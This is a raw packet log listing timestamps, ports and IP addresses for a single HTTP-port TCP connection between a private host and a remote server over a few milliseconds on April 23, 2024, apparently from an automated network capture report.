Apr 23, 2024 09:43:15.053576946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053589106 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053590059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053605080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053617954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053630114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053642035 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053642988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053657055 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053661108 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053668976 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053680897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053692102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053699017 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053704977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053715944 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053726912 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053726912 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053739071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053755999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053761005 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053769112 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053781986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053787947 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053793907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053808928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053812027 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053822041 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053833961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053836107 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053847075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053857088 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053860903 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053873062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053884029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053893089 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053896904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053905964 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053915024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053926945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053939104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053941011 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053951025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053963900 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053977013 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.053977013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.053991079 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054002047 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054003000 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054013968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054025888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054028988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054042101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054044962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054054022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054065943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054069996 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054080009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054095984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054104090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054107904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054120064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054128885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054131985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054146051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054155111 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054157972 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054171085 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054183006 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054183006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054195881 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054207087 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054207087 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054219007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054233074 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054233074 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054245949 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054256916 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054259062 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054269075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054276943 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054280043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054292917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054303885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054303885 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054322004 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054328918 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054337978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054346085 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054352045 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054363966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054378033 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054388046 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054390907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054403067 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054413080 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054414988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054428101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054430962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054440022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054452896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054456949 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054476023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054488897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054500103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054507971 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054512024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054524899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054534912 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054536104 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054548025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054559946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054562092 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054572105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054586887 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054595947 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054598093 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054610014 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054613113 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054621935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054639101 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054663897 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054682970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054696083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054707050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054719925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054730892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054730892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054747105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054759979 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054771900 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054774046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054789066 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054801941 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054801941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054819107 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054820061 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054831982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054843903 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054843903 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054857016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054868937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054873943 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054882050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054893970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054913998 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054920912 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054927111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054939032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054949045 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054949999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054964066 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054968119 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054979086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.054986000 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.054991961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055005074 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055010080 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055016994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055027962 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055038929 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055051088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055051088 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055063009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055067062 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055075884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055088997 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055089951 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055100918 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055108070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055114031 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055128098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055140972 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055143118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055155039 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055160999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055167913 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055169106 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055180073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055191994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055197001 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055203915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055217028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055217981 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055229902 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055243015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055252075 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055254936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055267096 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055275917 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055278063 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055293083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055301905 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055308104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055319071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055331945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055339098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055344105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055355072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055358887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055367947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055378914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055386066 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055392981 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055397034 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055412054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055423975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055428982 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055435896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055448055 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055461884 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055468082 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055480003 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055483103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055496931 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055497885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055510044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055521965 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055522919 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055532932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055545092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055551052 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055557013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055567980 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055578947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055583954 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055591106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055603027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055612087 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055613995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055624008 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055627108 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055640936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055651903 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055658102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055670023 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055670977 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055681944 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055695057 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055706024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055717945 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055717945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055738926 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055746078 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055756092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055768013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055783033 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055784941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055797100 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055809021 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055809021 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055821896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055835009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055835962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055846930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055860043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055860043 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055871010 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055881977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055883884 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055892944 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055907965 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055912018 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055923939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055924892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055937052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055948973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055960894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055973053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.055974007 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055988073 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.055989981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056003094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056015015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056024075 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056026936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056039095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056051016 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056052923 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056061983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056071997 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056076050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056090117 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056092978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056113005 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056113958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056127071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056138992 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056149960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056160927 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056162119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056175947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056184053 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056193113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056201935 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056205034 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056216955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056229115 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056229115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056241989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056255102 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056257963 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056272030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056283951 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056292057 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056297064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056308985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056310892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056319952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056332111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056340933 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056344032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056355953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056360006 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056366920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056379080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056391001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056396961 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056404114 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056418896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056422949 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056432962 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056444883 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056457043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056458950 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056468010 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056478977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056485891 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056492090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056504011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056504011 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056516886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056528091 CEST	80	49702	176.97.76.106	192.168.2.7
